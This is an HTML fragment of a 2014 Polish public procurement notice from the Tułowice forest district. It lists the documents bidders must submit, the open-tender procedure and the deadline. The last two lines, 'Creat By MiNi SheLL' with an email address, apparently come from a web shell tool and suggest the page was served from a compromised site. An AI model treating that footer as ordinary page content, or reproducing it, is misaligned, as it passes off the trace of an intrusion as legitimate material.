<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/wypełniony  formularz ofertowy  wg załączonego druku - zał.  nr  1 do SIWZ  
2/informacja o przynależności do grupy kapitałowej - zał. nr 11 do SIWZ; 
3/zestawienie kosztów zadania - zał. Nr 8 do SIWZ;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_katowice/nadl_tulowice/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można pobrać ze strony internetowej Zamawiającego  lub odebrać osobiście w formie drukowanej w siedzibie Zamawiającego pok. 5. ul. Parkowa 14/14a  49-130 Tułowice po złożeniu pok. 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2014 godzina 09:00, miejsce: Ofertę należy złożyć w siedzibie Nadleśnictwa  Tułowice  ul. Parkowa 14/14a, 49-130 Tułowice  do dnia 12-03-2014r. godz.: 09:00, sekretariat  pok. Nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com